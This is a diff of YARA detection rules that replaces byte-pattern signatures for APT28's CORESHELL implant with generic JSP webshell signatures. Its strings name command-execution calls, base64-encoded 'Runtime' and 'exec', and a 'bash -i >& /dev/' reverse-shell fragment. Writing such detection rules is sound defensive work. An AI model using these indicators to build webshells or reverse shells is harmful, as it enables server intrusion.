+rule SIGNATURE_BASE_EXT_WEBSHELL_JSP_Generic_Tiny : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "570d6996-ab16-556e-b790-e4c73d7bbffc"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L253-L267"
+		description = "Generic JSP webshell tiny"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fad14524-de44-52ea-95e6-3e5de3138926"
+		date = "2021-01-07"
+		modified = "2024-12-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5704-L5789"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "72b9e4de0389df3a14f92660e91749dea4d31905eb7391163c3503bc953d661f"
-		score = 85
-		quality = 85
+		hash = "8fd343db0442136e693e745d7af1018a99b042af"
+		hash = "87c3ac9b75a72187e8bc6c61f50659435dbdc4fde6ed720cebb93881ba5989d8"
+		hash = "1aa6af726137bf261849c05d18d0a630d95530588832aadd5101af28acc034b5"
+		logic_hash = "a6bf86961bc07b312fc24362d70d22ce826a2e918e1e0e8679bd415783d8500a"
+		score = 75
+		quality = 48
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53
-         56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68
-         [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
+		$payload1 = "ProcessBuilder" fullword wide ascii
+		$payload2 = "URLClassLoader" fullword wide ascii
+		$payload_rt1 = "Runtime" fullword wide ascii
+		$payload_rt2 = "getRuntime" fullword wide ascii
+		$payload_rt3 = "exec" fullword wide ascii
+		$jg_sus1 = "xe /c" ascii wide
+		$jg_sus2 = /getParameter\("."\)/ ascii wide
+		$jg_sus3 = "</pre>" ascii wide
+		$jg_sus4 = "BASE64Decoder" fullword ascii wide
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$fixed_cmd1 = "bash -i >& /dev/" ascii wide
+		$fp1 = "Find Security Bugs is a plugin that aims to help security audit.</Details>"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and all of them
+		(( filesize < 1000 and any of ( $jg_sus* ) ) or filesize < 250 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( ( any of ( $input* ) and any of ( $req* ) ) or ( any of ( $fixed_cmd* ) ) ) and ( 1 of ( $payload* ) or all of ( $payload_rt* ) ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V14 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "1e4958e7-e136-5600-bc16-36cdeeb3ea18"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L269-L293"
+		description = "Generic JSP webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "7535ade8-fc65-5558-a72c-cc14c3306390"
+		date = "2021-01-07"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5791-L5885"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4abb1e1c68ced667f04a69c58c89187f9ccc0633c5dc5f396ba8d210bf405f93"
-		score = 85
-		quality = 85
+		hash = "4762f36ca01fb9cda2ab559623d2206f401fc0b1"
+		hash = "bdaf9279b3d9e07e955d0ce706d9c42e4bdf9aa1"
+		hash = "ee9408eb923f2d16f606a5aaac7e16b009797a07"
+		logic_hash = "1a464e222704cfc947ed2f1c027c7871db8ab73e5130a309738afd25c8e614ab"
+		score = 75
+		quality = -24
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89
-         74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D
-         04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76
-         4C 89 6C 24  }
-		$STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D
-         04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7
-         E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48
-         FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
-		$STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04
-         1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1
-         C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
-		$STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03
-         C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
+		$susp0 = "cmd" fullword nocase ascii wide
+		$susp1 = "command" fullword nocase ascii wide
+		$susp2 = "shell" fullword nocase ascii wide
+		$susp3 = "download" fullword nocase ascii wide
+		$susp4 = "upload" fullword nocase ascii wide
+		$susp5 = "Execute" fullword nocase ascii wide
+		$susp6 = "\"pwd\"" ascii wide
+		$susp7 = "\"</pre>" ascii wide
+		$susp8 = /\\u00\d\d\\u00\d\d\\u00\d\d\\u00\d\d/ ascii wide
+		$susp9 = "*/\\u00" ascii wide
+		$fp1 = "command = \"cmd.exe /c set\";"
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$payload1 = "ProcessBuilder" fullword ascii wide
+		$payload2 = "processCmd" fullword ascii wide
+		$rt_payload1 = "Runtime" fullword ascii wide
+		$rt_payload2 = "getRuntime" fullword ascii wide
+		$rt_payload3 = "exec" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and any of them
+		filesize < 300KB and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) and not any of ( $fp* ) and any of ( $susp* )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V15 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Base64 : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "9bdaebc1-86a0-5c21-b752-d69cdb70f082"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L295-L310"
+		description = "Generic JSP webshell with base64 encoded payload"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2eabbad2-7d10-573a-9120-b9b763fa2352"
+		date = "2021-01-24"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5887-L5964"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fac61e80803941193c41ecf8b3fcbee21b5cc41542989ecd93542c32e87da983"
-		score = 85
-		quality = 85
+		hash = "8b5fe53f8833df3657ae2eeafb4fd101c05f0db0"
+		hash = "1b916afdd415dfa4e77cecf47321fd676ba2184d"
+		logic_hash = "1787b7c6e587e1745930faaac5d28338a86baf6abc19be7c0ffe875029ff6ca1"
+		score = 75
+		quality = 48
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
-		$XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
-		$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
+		$one1 = "SdW50aW1l" wide ascii
+		$one2 = "J1bnRpbW" wide ascii
+		$one3 = "UnVudGltZ" wide ascii
+		$one4 = "IAdQBuAHQAaQBtAGUA" wide ascii
+		$one5 = "SAHUAbgB0AGkAbQBlA" wide ascii
+		$one6 = "UgB1AG4AdABpAG0AZQ" wide ascii
+		$two1 = "leGVj" wide ascii
+		$two2 = "V4ZW" wide ascii
+		$two3 = "ZXhlY" wide ascii
+		$two4 = "UAeABlAGMA" wide ascii
+		$two5 = "lAHgAZQBjA" wide ascii
+		$two6 = "ZQB4AGUAYw" wide ascii
+		$three1 = "TY3JpcHRFbmdpbmVGYWN0b3J5" wide ascii
+		$three2 = "NjcmlwdEVuZ2luZUZhY3Rvcn" wide ascii
+		$three3 = "U2NyaXB0RW5naW5lRmFjdG9ye" wide ascii
+		$three4 = "MAYwByAGkAcAB0AEUAbgBnAGkAbgBlAEYAYQBjAHQAbwByAHkA" wide ascii
+		$three5 = "TAGMAcgBpAHAAdABFAG4AZwBpAG4AZQBGAGEAYwB0AG8AcgB5A" wide ascii
+		$three6 = "UwBjAHIAaQBwAHQARQBuAGcAaQBuAGUARgBhAGMAdABvAHIAeQ" wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$dex1 = "dex\n0"
+		$dex2 = "dey\n0"
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		($cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and filesize < 300KB and ( any of ( $one* ) and any of ( $two* ) or any of ( $three* ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V16 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Processbuilder : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "2c54a749-c80b-5010-97b6-b74c54fd3d07"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L312-L329"
+		description = "Generic JSP webshell which uses processbuilder to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2a7c5f44-24a1-5f43-996e-945c209b79b1"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L5966-L6003"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "638cb66e5ff52ac5a1df0954969e7c54a3b25518228e4f8f344aafe6760985d2"
-		score = 85
+		hash = "82198670ac2072cd5c2853d59dcd0f8dfcc28923"
+		hash = "c05a520d96e4ebf9eb5c73fc0fa446ceb5caf343"
+		hash = "347a55c174ee39ec912d9107e971d740f3208d53af43ea480f502d177106bbe8"
+		hash = "d0ba29b646274e8cda5be1b940a38d248880d9e2bba11d994d4392c80d6b65bd"
+		logic_hash = "fffc173cc23e158e319e48097243a64da232151e441c39e4b6ecc2565a82d862"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7
-         75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06
-         00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06
-         00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06
-         8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
+		$exec = "ProcessBuilder" fullword wide ascii
+		$start = "start" fullword wide ascii
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and $OBF_FUNCT
+		filesize < 2000 and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $start
 }
-rule SIGNATURE_BASE_IMPLANT_2_V17 : FILE
+
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Reflection : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "dc3a6b08-1ac4-5fa2-a710-657514d45606"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L331-L347"
+		description = "Generic JSP webshell which uses reflection to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "806ffc8b-1dc8-5e28-ae94-12ad3fee18cd"
+		date = "2021-01-07"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6005-L6087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ea2793e6ce9e9d97e70a9452a38eb4d5ddbcc275af6ae7f5d094dc77e112d278"
-		score = 85
-		quality = 85
+		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
+		hash = "bf0ff88cbb72c719a291c722ae3115b91748d5c4920afe7a00a0d921d562e188"
+		logic_hash = "386aeb3745c5dd815f00bbc941450a2c3f1ddfc2956c67ecd5bee9318b1756ef"
+		score = 75
+		quality = 0
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { 24108b44241c894424148b4424246836 }
-		$STR2 = { 518d4ddc516a018bd08b4de4e8360400 }
-		$STR3 = { e48178061591df75740433f6eb1a8b48 }
-		$STR4 = { 33d2f775f88b45d402d903c641321c3a }
-		$STR5 = { 006a0056ffd083f8ff74646a008d45f8 }
+		$ws_exec = "invoke" fullword wide ascii
+		$ws_class = "Class" fullword wide ascii
+		$fp1 = "SOAPConnection"
+		$fp2 = "/CORBA/"
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
+		$cj_encoded1 = "\"java.util.Base64$Decoder\"" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and 2 of them
+		all of ( $ws_* ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not any of ( $fp* ) and ( filesize < 10KB and ( any of ( $input* ) and any of ( $req* ) ) or ( filesize < 30KB and any of ( $cj_encoded* ) and math.entropy ( 500 , filesize -500 ) >= 5.5 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V18 : FILE
+
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Classloader : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "5376ec57-f405-55cf-a23b-aafb1cb800e5"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L349-L376"
+		description = "Generic JSP webshell which uses classloader to execute user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "037e6b24-9faf-569b-bb52-dbe671ab2e87"
+		date = "2021-01-07"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6089-L6166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d982b3b1407e140f586772ce409e47bd29e567af41e466cd94d0983c93aab917"
-		score = 85
-		quality = 85
+		hash = "6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347"
+		hash = "f3a7e28e1c38fa5d37811bdda1d6b0893ab876023d3bd696747a35c04141dcf0"
+		hash = "8ea2a25344e6094fa82dfc097bbec5f1675f6058f2b7560deb4390bcbce5a0e7"
+		hash = "b9ea1e9f91c70160ee29151aa35f23c236d220c72709b2b75123e6fa1da5c86c"
+		hash = "80211c97f5b5cd6c3ab23ae51003fd73409d273727ba502d052f6c2bd07046d6"
+		hash = "8e544a5f0c242d1f7be503e045738369405d39731fcd553a38b568e0889af1f2"
+		logic_hash = "109c0063f4e8db6172fd872b3b93d4f069234f28bbf033fbd2c5f135051df77e"
+		score = 75
+		quality = 0
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF
-         8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F
-         B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01
-         32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE
-         02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22
-         1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45
-         F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75
-         F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B
-         F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE
-         8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D
-         D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE
-         8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1
-         EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80
-         E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B
-         D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
+		$exec = "extends ClassLoader" wide ascii
+		$class = "defineClass" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		(( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $class ) and ( filesize < 10KB or ( filesize < 50KB and ( math.entropy ( 500 , filesize -500 ) <= 1 or math.entropy ( 500 , filesize -500 ) >= 7.7 ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_2_V19 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Encoded_Shell : FILE
 {
 	meta:
-		description = "CORESHELL/SOURFACE Implant by APT28"
-		author = "US CERT"
-		id = "b4efdb3c-d7d6-5141-ad73-90d70582f8bd"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L378-L404"
+		description = "Generic JSP webshell which contains cmd or /bin/bash encoded in ascii ord"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "359949d7-1793-5e13-9fdc-fe995ae12117"
+		date = "2021-01-07"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6168-L6194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "42bee6ddf0b13774efb6712135c3e0b4eae6364120f8973272820f5f669671d1"
-		score = 85
-		quality = 85
+		hash = "3eecc354390d60878afaa67a20b0802ce5805f3a9bb34e74dd8c363e3ca0ea5c"
+		hash = "f6c2112e3a25ec610b517ff481675b2ce893cb9f"
+		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
+		logic_hash = "74f45478e5bd7bb300e4ec493c2d3ef9a26340a141c3512a722618b3a3731500"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6
-         74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2
-         E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC
-         89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE
-         9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11
-         BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D
-         CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B }
-		$cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01
-         00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E
-         0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32
-         45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC
-         C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05
-         42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14
